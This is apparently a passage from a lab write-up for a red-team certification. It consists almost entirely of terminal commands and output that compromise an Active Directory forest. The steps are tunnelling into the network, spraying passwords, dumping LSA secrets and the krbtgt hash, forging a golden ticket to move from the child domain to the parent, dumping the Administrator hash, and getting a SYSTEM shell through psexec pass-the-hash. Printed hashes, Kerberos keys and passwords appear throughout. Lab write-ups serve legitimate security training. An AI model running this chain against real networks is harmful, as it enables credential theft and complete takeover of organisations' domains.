│ 1 │ root@ubuntu-virtual-machine - 192.168.80.10:45624 - 00505696e432 │ ligolo │ Online │
└───┴──────────────────────────────────────────────────────────────────┴───────────┴────────┘
[Agent : root@ubuntu-virtual-machine] »
---
# Victim
root@ubuntu-virtual-machine:/tmp# ./agent -connect 10.10.200.239:443 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="10.10.200.239:443"
Available hosts ping - 192.168.98.0/24¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ for i in {1..254} ;do (ping 192.168.98.$i -c 1 -w 1 >/dev/null && echo "192.168.98.$i" &) ;done
192.168.98.2
192.168.98.15
192.168.98.30
192.168.98.120
Creds spraying - netexec, user: john¶
1) Create wordlist with ips
___
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ cat 192.168.98.0_ips.txt
192.168.98.2
192.168.98.15
192.168.98.30
192.168.98.120
---
U: john
P: User1@#$%6
Confirm that the login/pass are working for MGMT
---
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netexec smb 192.168.98.0_ips.txt -u john -p 'User1@#$%6'
SMB 192.168.98.120 445 CDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:CDC) (domain:child.warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.120 445 CDC [+] child.warfare.corp\john:User1@#$%6
SMB 192.168.98.2 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.30 445 MGMT [*] Windows 10 / Server 2019 Build 17763 x64 (name:MGMT) (domain:child.warfare.corp) (signing:False) (SMBv1:False)
SMB 192.168.98.2 445 DC01 [-] warfare.corp\john:User1@#$%6 STATUS_LOGON_FAILURE
SMB 192.168.98.30 445 MGMT [+] child.warfare.corp\john:User1@#$%6 (Pwn3d!)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Dump LSAS creds - netexec¶
Found second accout: corpmngr with password
---
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netexec smb 192.168.98.0_ips.txt -u john -p 'User1@#$%6' --lsa
SMB 192.168.98.30 445 MGMT [*] Windows 10 / Server 2019 Build 17763 x64 (name:MGMT) (domain:child.warfare.corp) (signing:False) (SMBv1:False)
SMB 192.168.98.120 445 CDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:CDC) (domain:child.warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.30 445 MGMT [+] child.warfare.corp\john:User1@#$%6 (Pwn3d!)
SMB 192.168.98.2 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.120 445 CDC [+] child.warfare.corp\john:User1@#$%6
SMB 192.168.98.2 445 DC01 [-] warfare.corp\john:User1@#$%6 STATUS_LOGON_FAILURE
SMB 192.168.98.30 445 MGMT [+] Dumping LSA secrets
SMB 192.168.98.30 445 MGMT CHILD.WARFARE.CORP/john:$DCC2$10240#john#9855312d42ee254a7334845613120e61: (2025-01-17 14:47:56)
SMB 192.168.98.30 445 MGMT CHILD.WARFARE.CORP/corpmngr:$DCC2$10240#corpmngr#7fd50bbab99e8ea7ae9c1899f6dea7c6: (2025-01-21 11:35:46)
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:aes256-cts-hmac-sha1-96:344c70047ade222c4ab35694d4e3e36de556692f02ec32fa54d3160f36246eec
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:aes128-cts-hmac-sha1-96:aa5b3d84614911fe611eafbda613baaf
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:des-cbc-md5:6402e0c20b89d386
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:plain_password_hex:4f005d003b006f0074005d003500760067002f0032007a0046004e0020004d00700023003600570031005000770041002600700055003d005a0047006100370033003e003b0032004600410059002a006b0046004400410069003e00530066006a0033006e0061007a004e0060003300590063005e0048006c005c0053003e003e0033003c007300500043007a002500300031004b00610060002000540033007a003f004200580048002f0068006d0052006f0027005b00520061003b003a0075002b0050004a005d006b003c006d004c00730045005d005b0074006c004b00760045005c00280059003a0066002000
SMB 192.168.98.30 445 MGMT CHILD\MGMT$:aad3b435b51404eeaad3b435b51404ee:0f5fe480dd7eaf1d59a401a4f268b563:::
SMB 192.168.98.30 445 MGMT dpapi_machinekey:0x34e3cc87e11d51028ffb38c60b0afe35d197627d
dpapi_userkey:0xb890e07ba0d31e31c758d305c2a29e1b4ea813a5
SMB 192.168.98.30 445 MGMT NL$KM:df885acfa168074cc84de093af76093e726cd092e9ef9c72d6fe59c6cbb70382d896c9569b67dcdac871dd77b96916c8c1187d40c118474c481ddf62a7c04682
SMB 192.168.98.30 445 MGMT [email protected]:User4&*&*
SMB 192.168.98.30 445 MGMT [+] Dumped 10 LSA secrets to /home/kali/.nxc/logs/MGMT_192.168.98.30_2025-06-09_154016.secrets and /home/kali/.nxc/logs/MGMT_192.168.98.30_2025-06-09_154016.cached
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$
Creds spraying - netexec, user: corpmngr¶
Found creds for user corpmngr on CDC (192.168.98.120)
---
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netexec smb 192.168.98.0_ips.txt -u corpmngr -p 'User1@#$%6'
SMB 192.168.98.120 445 CDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:CDC) (domain:child.warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.120 445 CDC [-] child.warfare.corp\corpmngr:User1@#$%6 STATUS_LOGON_FAILURE
SMB 192.168.98.2 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.30 445 MGMT [*] Windows 10 / Server 2019 Build 17763 x64 (name:MGMT) (domain:child.warfare.corp) (signing:False) (SMBv1:False)
SMB 192.168.98.2 445 DC01 [-] warfare.corp\corpmngr:User1@#$%6 STATUS_LOGON_FAILURE
SMB 192.168.98.30 445 MGMT [-] child.warfare.corp\corpmngr:User1@#$%6 STATUS_LOGON_FAILURE
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netexec smb 192.168.98.0_ips.txt -u corpmngr -p 'User4&*&*'
SMB 192.168.98.2 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.30 445 MGMT [*] Windows 10 / Server 2019 Build 17763 x64 (name:MGMT) (domain:child.warfare.corp) (signing:False) (SMBv1:False)
SMB 192.168.98.2 445 DC01 [-] warfare.corp\corpmngr:User4&*&* STATUS_LOGON_FAILURE
SMB 192.168.98.30 445 MGMT [+] child.warfare.corp\corpmngr:User4&*&*
SMB 192.168.98.120 445 CDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:CDC) (domain:child.warfare.corp) (signing:True) (SMBv1:False)
SMB 192.168.98.120 445 CDC [+] child.warfare.corp\corpmngr:User4&*&* (Pwn3d!)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Add hostnames to /etc/hosts¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ cat /etc/hosts | grep 192.168.98
192.168.98.2 warfare.corp dc01.warfare.corp
192.168.98.120 child.warfare.corp cdc.child.warfare.corp
192.168.98.30 mgmt.warfare.corp mgmt.child.warfare.corp
Extract hash krbtgt - impacket/secretsdump.py¶
hash krbtgt
___
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ ldapsearch -H ldap://cdc.child.warfare.corp -D '[email protected]' -w 'User4&*&*' -b 'DC=child,DC=warfare,DC=corp' "(sAMAccountName=krbtgt)" # extended LDIF
#
# LDAPv3
# base <DC=child,DC=warfare,DC=corp> with scope subtree
# filter: (sAMAccountName=krbtgt)
# requesting: ALL
#
# krbtgt, Users, child.warfare.corp
dn: CN=krbtgt,CN=Users,DC=child,DC=warfare,DC=corp
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: krbtgt
description: Key Distribution Center Service Account
distinguishedName: CN=krbtgt,CN=Users,DC=child,DC=warfare,DC=corp
instanceType: 4
whenCreated: 20250117143052.0Z
whenChanged: 20250117144602.0Z
uSNCreated: 12300
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=child,DC=warfa
re,DC=corp
uSNChanged: 12932
showInAdvancedViewOnly: TRUE
name: krbtgt
objectGUID:: RVoKHGFL3Uut/JKYLzVgHQ==
userAccountControl: 514
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 133815978520688766
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAkKHO39ID/ARpLEtw9gEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: krbtgt
sAMAccountType: 805306368
servicePrincipalName: kadmin/changepw
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=warfare,DC=corp
isCriticalSystemObject: TRUE
dSCorePropagationData: 20250117144602.0Z
dSCorePropagationData: 20250117143052.0Z
dSCorePropagationData: 16010101000416.0Z
msDS-SupportedEncryptionTypes: 0
# search reference
ref: ldap://DomainDnsZones.child.warfare.corp/DC=DomainDnsZones,DC=child,DC=wa
rfare,DC=corp
# search result
search: 2
result: 0 Success
# numResponses: 3
# numEntries: 1
# numReferences: 1
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -debug child/corpmngr:'User4&*&*'@cdc.child.warfare.corp -just-dc-user 'child\krbtgt'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for child\krbtgt
[+] Calling DRSGetNCChanges for {1c0a5a45-4b61-4bdd-adfc-92982f35601d}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=child,DC=warfare,DC=corp
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2
krbtgt:aes128-cts-hmac-sha1-96:806d6ea798a9626d3ad00516dd6968b5
krbtgt:des-cbc-md5:ba0b49b6b6455885
[*] Cleaning up...
Golden ticket¶
Get SID's¶
Parent SID : S-1-5-21-3375883379-808943238-3239386119
Child SID : S-1-5-21-3754860944-83624914-1883974761
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/lookupsid.py child/corpmngr:'User4&*&*'@child.warfare.corp | grep "Domain SID"
[*] Domain SID is: S-1-5-21-3754860944-83624914-1883974761
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/lookupsid.py child/corpmngr:'User4&*&*'@warfare.corp | grep "Domain SID"
[*] Domain SID is: S-1-5-21-3375883379-808943238-3239386119
Golden ticket - ticketer.py¶
Hash hrbtgt: ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2
Parent SID : S-1-5-21-3375883379-808943238-3239386119
Child SID : S-1-5-21-3754860944-83624914-1883974761
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/ticketer.py -domain child.warfare.corp -aesKey ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for child.warfare.corp/corpmngr
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in corpmngr.ccache
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ KRB5CCNAME=corpmngr.ccache
Request Service Ticket¶
Sync time with dc01.warfare.corp¶
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ date && sudo ntpdate -q dc01.warfare.corp
Tue Jun 10 12:57:43 PM CEST 2025
2025-06-10 12:44:07.800587 (+0200) -816.459912 +/- 0.168078 dc01.warfare.corp 192.168.98.2 s1 no-leap
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ date && sudo ntpdate -u dc01.warfare.corp
Tue Jun 10 12:57:47 PM CEST 2025
2025-06-10 12:44:11.601715 (+0200) -816.431309 +/- 0.196975 dc01.warfare.corp 192.168.98.2 s1 no-leap
CLOCK: time stepped by -816.431309
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ date && sudo ntpdate -q dc01.warfare.corp
Tue Jun 10 12:44:30 PM CEST 2025
2025-06-10 12:44:30.684135 (+0200) -0.029413 +/- 0.169560 dc01.warfare.corp 192.168.98.2 s1 no-leap
Request Service Ticket - getST.py¶
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/getST.py -spn 'CIFS/dc01.warfare.corp' -k -no-pass child.warfare.corp/corpmngr -debug
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: corpmngr.ccache
[+] Returning cached credential for KRBTGT/[email protected]
[+] Using TGT from cache
[+] Username retrieved from CCache: corpmngr
[*] Getting ST for user
[+] Trying to connect to KDC at CHILD.WARFARE.CORP:88
[+] Trying to connect to KDC at WARFARE.CORP:88
[*] Saving ticket in corpmngr@[email protected]
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ export KRB5CCNAME=corpmngr@[email protected]
Extract password for user Administrator¶
hash Administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60:::
---
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ date && sudo ntpdate -u dc01.warfare.corp
Tue Jun 10 01:04:06 PM CEST 2025
2025-06-10 12:50:29.993375 (+0200) -816.460204 +/- 0.178708 dc01.warfare.corp 192.168.98.2 s1 no-leap
CLOCK: time stepped by -816.460204
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -k -no-pass dc01.warfare.corp -just-dc-user 'warfare\Administrator' -debug
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: corpmngr@[email protected]
[+] Domain retrieved from CCache: CHILD.WARFARE.CORP
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[+] Changing sname from CIFS/[email protected] to CIFS/[email protected] and hoping for the best
[+] Username retrieved from CCache: corpmngr
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for warfare\Administrator
[+] Calling DRSGetNCChanges for {17446816-c072-445e-ac9b-c0e28630bed6}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=warfare,DC=corp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ca1d92ce23046a58b1cec292376a7d3ec6de02176bf44fb50fede1db46fec183
Administrator:aes128-cts-hmac-sha1-96:33d3f5778fade9945053a05ce2f18445
Administrator:des-cbc-md5:3ba88a586240f423
[*] Cleaning up...
Login as user: Administratror - dc01¶
Login - psexec.py¶
┌──(kali㉿kali)-[~/…/CRTA/impacket/impacket/examples]
└─$ /usr/share/doc/python3-impacket/examples/psexec.py -debug 'warfare/[email protected]' -hashes aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] StringBinding ncacn_np:dc01.warfare.corp[\pipe\svcctl]
[*] Requesting shares on dc01.warfare.corp.....
[*] Found writable share ADMIN$
[*] Uploading file KitMylyT.exe
[*] Opening SVCManager on dc01.warfare.corp.....
[*] Creating service HaQq on dc01.warfare.corp.....
[*] Starting service HaQq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.
Read whoami /all¶
C:\Windows\system32> whoami /all
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
ERROR: Unable to get user claims information.
C:\Windows\system32>
Lessons Learned¶
Tags¶
References¶
https://github.com/nicocha30/ligolo-ng/releases/tag/v0.8.2